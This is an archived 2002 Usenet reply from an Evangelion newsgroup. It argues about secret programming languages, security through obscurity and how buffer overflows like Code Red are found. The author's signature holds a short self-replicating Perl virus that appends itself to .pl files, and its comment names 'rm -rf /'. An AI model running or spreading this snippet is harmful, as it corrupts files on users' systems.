Re: Which programming languages in NGE?

From(投稿者):

Rudolf Polzer <AntiATField_adsgohere@durchnull.de>

Newsgroups(投稿グループ):

japan.anime.evangelion

Subject(見出し):

Re: Which programming languages in NGE?

Date(投稿日時):

Tue, 2 Jul 2002 11:54:20 +0200

Organization(所属):

T-Online

References(祖先記事, 一番最後が直親):

(G) <slrnahrqs6.r51.AntiATField_adsgohere@www42.durchnull.de>

(G) <uhsklrg47fb93f@corp.supernews.com>

(G) <slrnahtis8.mbq.AntiATField_adsgohere@www42.durchnull.de>

(G) <uhtl2b1pk8op22@corp.supernews.com>

(G) <slrnahtpg5.5i7.AntiATField_adsgohere@www42.durchnull.de>

(G) <uhvgssnh6egq18@corp.supernews.com>

(G) <slrnai05p3.ar9.AntiATField_adsgohere@www42.durchnull.de>

(G) <ui0gono80e2r5d@corp.supernews.com>

(G) <slrnai0ml2.csc.AntiATField_adsgohere@www42.durchnull.de>

(G) <ui1or2hvfimnce@corp.supernews.com>

Message-ID(記事識別符号):

(G) <slrnai2u2c.i7g.AntiATField_adsgohere@www42.durchnull.de>

記事全体へのコマンド

Scripsit illa aut ille Disaster <disaster@disfanfic.net>:
[...]
> > So if you see:
> >
> > define f<integer> {x<integer>}
> >   pow {x, 2} + 17 --> y<integer>
> >   x * y --> f
> >
> > define g<integer> {x<string>}
> >   %% push &x
> >   %% call atoi
> >   %% mov &g, @result
> >
> > you exactly know what f and g do.
> 
> Actually! I don't! I don't understand that at all.

Probably you've never seen any programming language at all. Tenchi will
understand both (and be able to say both are useless) even if only
knowing Visual Basic.

> > So there is no point of having a secret programming language: as soon as
> > someone gets some source code written in it, the language is revealed,
> > and if nobody gets source written in it, he only has the description of
> > the language (not even a compiler) and cannot do any harm using it
> > (not more harm than using assembler).
> 
> Then don't let anyone get the source code!

If nobody gets the source code, you can give out the language specs and
receive licensing fees.

But that's the problem: not giving out the language specs does not
increase security. Not giving out the source of your own programs might
increase it - probably it does not, because it is too easy to get it if
you really want it. You just need a good gun...

Look at ID Software. They give out the full source code for Quake 3 for
free. Only the game data files are what you pay for. But it does not do
any harm to ID Software to give out the source since a small group
cannot make a complete game out of it (the data files are the main
work) and the GPL must be inherited.

> > > An evolved entity is still it's own entity. That which is derived from C
> > > is no longer C.
> >
> > Therefore C is not C because there are different standards about it:
> > K&R, ANSI C, ANSI C99.
> 
> Well C is C. But something other then C is not C

K&R C is not ANSI C99.

> > > > If you design a new language that is not derived from a current one, you
> > > > won't find programmers learning it.
> > >
> > > Which is a good reason why NERV would use it in the first place.
> >
> > Security by obscurity is no security concept at all. They aren't that
> > stupid.
> 
> It is one concept. It is also a good concept! Sometimes necessary. I don't
> know where you learnt otherwise but go beat the crap out of them.

At least in cryptography it's really true.

- If you have a simple, crackable algorithm and do not tell anyone about
  it, probably someone might be able to guess the algorithm.
- If you have a complicated, uncrackable algorithm, giving it out does
  not do any harm to your security.

Especially one must never rely on nobody knowing the algorithm, and
exactly this is security by obscurity.

But now think about someone finding a bug in your program. If the source
is available, most probably they will send you a patch for it and then
publish the bug with the patch. So anyone (especially the script
kiddies) know the bug, but every admin can patch his version of the
program to remove the security hole. If the source is unavailable, the
bug will be published anyway - but without a patch. The time when script
kiddies can exploit it will be longer.

I just found
http://www-106.ibm.com/developerworks/security/library/s-obs.html?dwzone=security
- maybe that interests you.

> > Anyone can read the source of GPG, but did anyone break the encryption?
> > Nobody except MS knows the Internet Explorer source, but there are known
> > security holes?
> 
> Well, what about those people who have stolen the source?

They are not the only ones to find security holes. Most holes are found
by those who have never seen the source - just by trying out some things
in JavaScript.

Especially, CodeRed used an approach that does not require seeing the
source - it does not even help with that! They just tried putting very
long strings into the URL and saw the program crashed. Then ran the
program in a debugger, looked what memory area was overwritten, changed
the bytes of the long string so that there is a pointer pointing to some
area in the long string at the place where the code wanted to return. So
they executed their own assembly code - without requiring the IIS source
even once. Most buffer overruns were found by Trial&Error.

> > > > A big project like MAGI
> > > > cannot be done if the programmers first have to learn a completely new
> > > > programming language.
> > >
> > > Of course it can! You just need to train them in the new language first.
> >
> > That costs too much time.
> 
> They had time!

They could not know when the first Angel attacks.

At least that's how episode 01 sounds.


-- 
#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
####################### http://learn.to/quote #######################

Fnews-brouse 1.9(20180406) -- by Mizuno, MWE <mwe@ccsf.jp>
GnuPG Key ID = ECC8A735
GnuPG Key fingerprint = 9BE6 B9E9 55A5 A499 CD51 946E 9BDC 7870 ECC8 A735